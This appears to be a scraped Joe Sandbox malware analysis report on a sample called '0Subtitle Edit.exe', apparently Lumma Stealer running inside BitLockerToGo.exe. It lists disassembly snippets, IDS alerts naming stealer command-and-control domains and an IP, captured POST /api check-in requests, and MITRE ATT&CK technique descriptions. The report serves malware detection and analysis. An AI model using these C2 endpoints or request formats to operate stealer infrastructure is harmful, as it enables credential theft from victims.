Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_00421030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	2_2_00438830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_004110C7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_0040F11C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_0040F11C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ebx	2_2_004071F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00419A40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	2_2_0041DA50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041DA50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	2_2_0040F20D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_00414AF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_00414AF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], dl	2_2_004272F1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00420A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_00437280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_00438280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [0043FE64h]	2_2_0041EA8C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041AA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx esi, byte ptr [ebp+00h]	2_2_00437AA2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push edi	2_2_00420333
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_0040EBD3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	2_2_004133F7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edx], 77A9E0C4h	2_2_00438430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_004214E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, dword ptr [ebp-7Ch]	2_2_0041B4F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_0041049E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp al, 2Eh	2_2_0041DCB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0040AD00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0042AD20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_00434650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_00432650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_00413600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041D620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_00436622
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	2_2_00437690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ecx], 625B6034h	2_2_004127CF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_004197E0

Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:50099 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:49209 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 188.114.96.3:443

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: separateedmsqj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=XRu95sVNoGkSeHaTLKe6ecZVkq6cnlTXtPLV4r8Wmas-1724938823-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 76Host: traineiwnqo.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: separateedmsqj.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0Subtitle Edit.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
0Subtitle Edit.exe

Function 00435EF8 Relevance: 8.1, Strings: 6, Instructions: 585
COMMON

Function 0040C926 Relevance: 5.6, Strings: 4, Instructions: 568
COMMON

Function 00433DD2 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Function 00435DA0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00435E33 Relevance: 1.5, Strings: 1, Instructions: 244
COMMON

Function 004367B0 Relevance: .2, Instructions: 154
COMMON

Function 0040B270 Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 516
libraryCOMMON

Function 004350B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 250
COMMON

Function 0040A100 Relevance: 6.2, APIs: 4, Instructions: 211
COMMON

Function 0040D790 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309
COMMON

Function 0042E2D4 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Function 00433D50 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON